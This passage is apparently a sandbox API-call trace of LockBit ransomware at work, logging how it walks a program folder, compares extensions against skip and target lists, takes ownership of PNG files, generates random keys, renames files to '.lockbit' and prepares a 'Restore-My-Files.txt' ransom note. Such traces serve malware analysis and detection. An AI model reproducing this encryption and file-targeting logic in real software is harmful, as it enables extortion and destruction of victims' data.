(lpString1=".sqlite", lpString2=".png") returned 1 [0082.710] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.710] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.710] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.710] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png.lockbit") returned 80 [0082.710] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.732] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.733] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.733] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.733] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.733] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.733] RtlFreeAnsiString (AnsiString="\\") [0082.734] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.734] malloc (_Size=0x200) returned 0x77d800 [0082.734] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.734] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.734] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.734] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.735] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.735] CloseHandle (hObject=0x3c4) returned 1 [0082.735] free (_Block=0x77d800) [0082.735] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.736] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.736] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.736] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=25243) returned 1 [0082.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.737] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.756] malloc (_Size=0xb6) returned 0x77d800 [0082.756] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0xc0000008 [0082.756] free (_Block=0x77d800) [0082.756] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.756] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.756] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.756] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700a0016, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700a0016, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Perf_Scenes_Mask1.png", cAlternateFileName="")) returned 1 [0082.757] lstrcmpiW (lpString1=".", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.757] lstrcmpiW (lpString1="..", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.757] PathFindExtensionW (pszPath="Perf_Scenes_Mask1.png") returned=".png" [0082.757] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.757] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.757] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.757] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.757] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.758] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.758] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.759] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Perf_Scenes_Mask1.png") returned 1 [0082.759] lstrcmpiW (lpString1="ntldr", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.759] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.759] lstrcmpiW (lpString1="bootsect.bak", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.759] lstrcmpiW (lpString1="autorun.inf", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.759] lstrcmpiW (lpString1="thumbs.db", lpString2="Perf_Scenes_Mask1.png") returned 1 [0082.759] lstrcmpiW (lpString1="iconcache.db", lpString2="Perf_Scenes_Mask1.png") returned -1 [0082.759] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.759] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png") returned=".png" [0082.759] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.759] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.759] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.759] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.760] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.760] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.760] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.760] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.760] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.760] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.760] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png.lockbit") returned 86 [0082.760] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.761] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.761] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.761] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.761] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.762] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.762] RtlFreeAnsiString (AnsiString="\\") [0082.762] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.762] malloc (_Size=0x200) returned 0x77d800 [0082.762] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.762] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.762] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.762] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.762] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.763] CloseHandle (hObject=0x3c4) returned 1 [0082.763] free (_Block=0x77d800) [0082.763] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.763] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.763] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.763] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=6922) returned 1 [0082.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.765] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.770] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.770] malloc (_Size=0xc2) returned 0x77d800 [0082.776] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0082.776] free (_Block=0x77d800) [0082.777] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.777] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.777] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.777] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Perf_Scenes_Subpicture1.png", cAlternateFileName="")) returned 1 [0082.777] lstrcmpiW (lpString1=".", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.777] lstrcmpiW (lpString1="..", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.777] PathFindExtensionW (pszPath="Perf_Scenes_Subpicture1.png") returned=".png" [0082.777] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.777] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.777] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.777] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.777] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.777] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.777] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.777] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.778] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.778] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.778] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.778] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.778] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.778] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.779] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.779] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.779] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.779] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.779] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.779] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Perf_Scenes_Subpicture1.png") returned 1 [0082.779] lstrcmpiW (lpString1="ntldr", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.779] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.779] lstrcmpiW (lpString1="bootsect.bak", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.780] lstrcmpiW (lpString1="autorun.inf", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.780] lstrcmpiW (lpString1="thumbs.db", lpString2="Perf_Scenes_Subpicture1.png") returned 1 [0082.780] lstrcmpiW (lpString1="iconcache.db", lpString2="Perf_Scenes_Subpicture1.png") returned -1 [0082.780] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.780] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png") returned=".png" [0082.780] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.780] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.780] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.780] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.781] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.781] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.781] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png.lockbit") returned 92 [0082.781] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.782] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.782] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.783] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.783] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.783] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.783] RtlFreeAnsiString (AnsiString="\\") [0082.783] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.783] malloc (_Size=0x200) returned 0x77d800 [0082.783] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, 